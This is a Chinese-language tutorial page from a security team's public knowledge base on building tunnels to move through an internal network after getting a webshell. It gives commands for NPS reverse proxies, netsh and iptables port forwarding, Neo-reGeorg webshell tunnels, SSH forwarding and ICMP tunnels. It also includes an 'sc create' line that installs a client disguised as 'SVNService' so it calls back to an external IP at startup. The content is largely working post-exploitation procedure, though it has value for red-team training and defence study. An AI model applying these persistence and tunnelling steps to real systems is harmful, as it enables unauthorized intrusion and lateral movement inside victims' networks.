<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>构建通道漫游内网 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"> <main class="page"> <div class="theme-antdocs-content content__default"><h1 id="网络连通性测试">网络连通性测试 <a href="#网络连通性测试" class="header-anchor">#</a></h1> <blockquote><p>当我们千辛万苦通过外网边界的一个入口点拿到Webshell后，想要在内网横向拓展战果第一件事情就是要构建内网通道，构建通道的方法网上也有很多五花八门的方法有老到被杀软干掉的lcx还有配置复杂的FRP，本文是作者自己实战中觉得更加方便实用的一些方法。例如目标能出网时用的搭建和操作都极其简单的NPS（反向代理），以及目标不能出网时用的Neo-reGeorg（正向代理）</p></blockquote> <p><strong>ICMP</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">ping</span> <span class="token number">114.114</span>.114.114 -n <span class="token number">1</span>	<span class="token comment">#Windows</span>
<span class="token function">ping</span> <span class="token number">114.114</span>.114.114 -c <span class="token number">1</span>	<span class="token comment">#Linux</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>HTTP</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">curl</span> http://www.baidu.com
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>DNS</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">nslookup</span> baidu.com
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>仅DNS出网可直接上CS-DNS上线</p> <p><strong>读取本机代理</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>REG QUERY <span class="token string">&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings&quot;</span>
<span class="token comment">#查看代理配置情况,连接它的代理试试</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>是否存在Nginx反向代理</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#1、找到Nginx目录</span>
<span class="token comment">#2、查看配置文件</span>
<span class="token comment">#3、例如某次实战中发现正反向都代理不出去，查看配置文件发现了nginx反代，直接连接公网IP代理的3389端口</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><h1 id="反向代理">反向代理 <a href="#反向代理" class="header-anchor">#</a></h1> <p>服务器能<strong>出网</strong>的情况下，反向代理可以穿透防火墙（需要上传文件）</p> <blockquote><p>1、CobaltStrike 自带的Socks代理</p> <p>2、NPS（简单 自带Web管理页面、稳定跨平台、支持多级代理）</p></blockquote> <h2 id="搭建nps">搭建NPS <a href="#搭建nps" class="header-anchor">#</a></h2> <p>1、下载nps服务端到自己的VPS（以Linux-Centos为例）https://ehang-io.github.io/nps</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">sudo</span> ./nps <span class="token function">install</span>	<span class="token comment">#安装</span>
<span class="token function">sudo</span> nps start		<span class="token comment">#启动</span>
<span class="token function">sudo</span> nps stop		<span class="token comment">#停止</span>
<span class="token function">sudo</span> nps reload		<span class="token comment">#服务端配置文件重载</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>2、修改配置文件（敏感信息改掉） <code>/etc/nps/conf/nps.conf</code></p> <table><thead><tr><th>名称</th> <th>含义</th></tr></thead> <tbody><tr><td>web_port</td> <td>web管理端口</td></tr> <tr><td>web_password</td> <td>web界面管理密码</td></tr> <tr><td>web_username</td> <td>web界面管理账号</td></tr> <tr><td>auth_key</td> <td>web api密钥</td></tr> <tr><td>public_vkey</td> <td>客户端以配置文件模式启动时的密钥，设置为空表示关闭客户端配置文件连接模式</td></tr> <tr><td>auth_crypt_key</td> <td>获取服务端authKey时的aes加密密钥，16位</td></tr></tbody></table> <p><strong>创建系统服务</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sc create svnservice <span class="token assign-left variable">binpath</span><span class="token operator">=</span> <span class="token string">&quot;C:\Users\Public\Videos\setup.exe -server=111.173.114.77:8091 -vkey=zkxcn35bhkzit2kt -type=tcp&quot;</span>  <span class="token assign-left variable">displayname</span><span class="token operator">=</span> <span class="token string">&quot;SVNService&quot;</span> <span class="token assign-left variable">depend</span><span class="token operator">=</span> Tcpip <span class="token assign-left variable">start</span><span class="token operator">=</span> auto
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sc start svnservice
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h1 id="正向转发">正向转发 <a href="#正向转发" class="header-anchor">#</a></h1> <h2 id="windows-netsh-端口转发-双网卡用">Windows netsh 端口转发（双网卡用） <a href="#windows-netsh-端口转发-双网卡用" class="header-anchor">#</a></h2> <p><code>netsh</code>仅支持TCP协议， 适用于<strong>双网卡</strong>服务器</p> <p>连接外网6666端口，就是连接到内网目标上面的3389。</p> <p><strong>启动转发</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#查看现有规则</span>
netsh interface portproxy show all

<span class="token comment">#添加转发规则</span>
netsh interface portproxy <span class="token builtin class-name">set</span> v4tov4 <span class="token assign-left variable">listenaddress</span><span class="token operator">=</span>外网IP <span class="token assign-left variable">listenport</span><span class="token operator">=</span><span class="token number">6666</span> <span class="token assign-left variable">connectaddress</span><span class="token operator">=</span>内网IP <span class="token assign-left variable">connectport</span><span class="token operator">=</span><span class="token number">3389</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>取消转发</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#删除转发规则</span>
netsh interface portproxy delete v4tov4 <span class="token assign-left variable">listenport</span><span class="token operator">=</span><span class="token number">6666</span>

<span class="token comment">#XP系统需先安装IPv6才能使用portproxy</span>
netsh interface ipv6 <span class="token function">install</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><h2 id="linux-iptables-端口转发-高权限用">Linux iptables 端口转发（高权限用） <a href="#linux-iptables-端口转发-高权限用" class="header-anchor">#</a></h2> <p>1、编辑配置文件</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">vi</span> /etc/sysctl.conf
	net.ipv4.ip_forward <span class="token operator">=</span> <span class="token number">1</span><span class="token comment">#开启IP转发</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>2、关闭服务</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">service</span> iptables stop
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>3、配置规则</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#需要访问的内网地址：10.1.1.11（Windows）</span>
<span class="token comment">#内网边界web服务器：192.168.100.100（Linux）</span>
iptables -t nat -A PREROUTING --dst <span class="token number">192.168</span>.100.100 -p tcp --dport <span class="token number">3389</span> -j DNAT --to-destination <span class="token number">10.1</span>.1.11:3389

iptables -t nat -A POSTROUTING --dst <span class="token number">10.1</span>.1.11 -p tcp --dport <span class="token number">3389</span> -j SNAT --to-source <span class="token number">192.168</span>.100.100
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>4、保存并重启服务</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">service</span> iptables save <span class="token operator">&amp;&amp;</span> <span class="token function">service</span> iptables start
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>这时访问Web服务器的3389就能登录到内网机器的桌面了。</p> <h2 id="neo-regeorg-端口复用">Neo-reGeorg 端口复用 <a href="#neo-regeorg-端口复用" class="header-anchor">#</a></h2> <p>配合Webshell，复用目标的Web服务端口开一个Socks5代理隧道。</p> <p>https://github.com/L-codes/Neo-reGeorg</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>python3 neoreg.py generate -k password					<span class="token comment">#生成服务端</span>
python3 neoreg.py -k password -u http://xx/tunnel.php	<span class="token comment">#在本地建立Socks5代理</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><h1 id="linux-ssh隧道-高权限用">Linux SSH隧道（高权限用） <a href="#linux-ssh隧道-高权限用" class="header-anchor">#</a></h1> <p>SSH一般是允许通过防火墙的，而且传输过程是加密的</p> <p><strong>本地转发（正向）</strong></p> <p>在<code>中转VPS</code>上执行以下命令</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">ssh</span> -CfNg -L <span class="token operator">&lt;</span>VPS监听端口<span class="token operator">&gt;</span>:<span class="token operator">&lt;</span>目标内网IP<span class="token operator">&gt;</span>:<span class="token operator">&lt;</span>目标端口<span class="token operator">&gt;</span> <span class="token operator">&lt;</span>（root@目标外网Web服务器，会要求输入密码）<span class="token operator">&gt;</span>

<span class="token function">ssh</span> -CfNg -L <span class="token number">8080</span>:10.1.1.3:3389 root@100.100.1.100

<span class="token comment">#VPS上查看监听端口是否已建立（注意：上面示例 -L 指定的监听端口是8080，此处及下文的8090需与之保持一致）</span>
<span class="token function">netstat</span> -tulnp <span class="token operator">|</span> <span class="token function">grep</span> <span class="token string">&quot;8090&quot;</span>

<span class="token comment">#连接目标内网服务器的远程桌面</span>
VPS-IP:8090
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><p>SSH进程的本地端口映射，将本地端口转发到远端指定机器的指定端口；</p> <p>在本地监听一个端口，所有访问这个端口的流量都会通过SSH隧道传输到远端的对应端口。</p> <p><strong>远程转发（反向）</strong></p> <p>在<code>Web服务器</code>上执行如下命令</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">ssh</span> -CfNg -R <span class="token operator">&lt;</span>VPS的端口<span class="token operator">&gt;</span>:<span class="token operator">&lt;</span>目标内网IP<span class="token operator">&gt;</span>:<span class="token operator">&lt;</span>目标端口<span class="token operator">&gt;</span> <span class="token operator">&lt;</span>（root@VPS-IP，会要求输入密码）<span class="token operator">&gt;</span>

<span class="token function">ssh</span> -CfNg -R <span class="token number">8090</span>:10.1.1.3:3389 root@192.168.0.1
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>访问<code>VPS</code>的8090端口，即可连接内网数据库服务器的3389</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>VPS-IP:8090
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>所有访问<code>VPS</code>的8090端口的流量都会通过SSH隧道传输到数据库服务器的3389端口</p> <h1 id="icmp加密隧道">ICMP加密隧道 <a href="#icmp加密隧道" class="header-anchor">#</a></h1> <p>适用场景 ：特殊环境下<code>ICMP</code>流量允许出网，穿透防火墙</p> <p>工具：<a href="https://github.com/jamesbarlow/icmptunnel" target="_blank" rel="noopener noreferrer">icmptunnel<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a> （只能在Linux上使用）</p> <p><strong>安装服务端</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">git</span> clone https://github.com/jamesbarlow/icmptunnel.git
<span class="token builtin class-name">cd</span> icmptunnel/
<span class="token function">make</span>
sysctl -w net.ipv4.icmp_echo_ignore_all<span class="token operator">=</span><span class="token number">1</span>	<span class="token comment">#禁用自带的ICMP，两端都要</span>
./icmptunnel -s 							<span class="token comment">#服务端以root用户监听</span>
<span class="token punctuation">(</span>ctrl-z<span class="token punctuation">)</span>									
<span class="token function">bg</span>											<span class="token comment">#后台挂起</span>
<span class="token function">ifconfig</span> tun0 <span class="token number">10.0</span>.0.1 netmask <span class="token number">255.255</span>.255.0<span class="token comment">#给隧道接口分配一个 IP 地址</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p><strong>客户端连接</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>./icmptunnel <span class="token operator">&lt;</span>server-IP<span class="token operator">&gt;</span>
<span class="token punctuation">(</span>ctrl-z<span class="token punctuation">)</span>
<span class="token function">bg</span>											<span class="token comment">#后台挂起</span>
<span class="token function">ifconfig</span> tun0 <span class="token number">10.0</span>.0.2 netmask <span class="token number">255.255</span>.255.0<span class="token comment">#给隧道接口分配一个 IP 地址</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>现在，我们拥有一个端到端基于 ICMP 数据包的隧道，测试SSH连接</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">ssh</span> root@10.0.0.1
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>当然也可以把远程服务器当作一个加密的 SOCKS 代理：</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">ssh</span> -D <span class="token number">8080</span> -N root@10.0.0.1
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>浏览器设置代理 socks://10.0.0.1:8080（注意：<code>ssh -D 8080</code> 的SOCKS端口监听在执行该命令的本机上，代理地址通常应填 127.0.0.1:8080）</p> <h1 id="边界代理">边界代理 <a href="#边界代理" class="header-anchor">#</a></h1> <p><strong>遵循三个原则</strong></p> <ol><li><strong>稳定性</strong>（主要用于扫描）{ 支持高并发、自动断线重连 }</li> <li><strong>安全性</strong>（防止socks5直接被ban）{ 流量可加密、开放代理可设置认证 }</li> <li><strong>健壮性</strong>   { 支持多种协议方式、最好支持插件定制 }</li></ol> <p><strong>Windows连接</strong></p> <p>Proxifier全局代理（<a href="https://pan.wgpsec.org" target="_blank" rel="noopener noreferrer">狼盘下载<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>）</p> <p><strong>Linux连接</strong></p> <p>使用<a href="https://github.com/rofl0r/proxychains-ng" target="_blank" rel="noopener noreferrer">proxychains<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>，配合MSF使用</p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a 
href="/knowledge/hw/border-info.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        互联网边界打点
      </a></span> <span class="next"><a href="/knowledge/hw/host-survival-domain.html">
        域内主机存活探测
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/52.fb0a5327.js" defer></script>
  </body>
</html>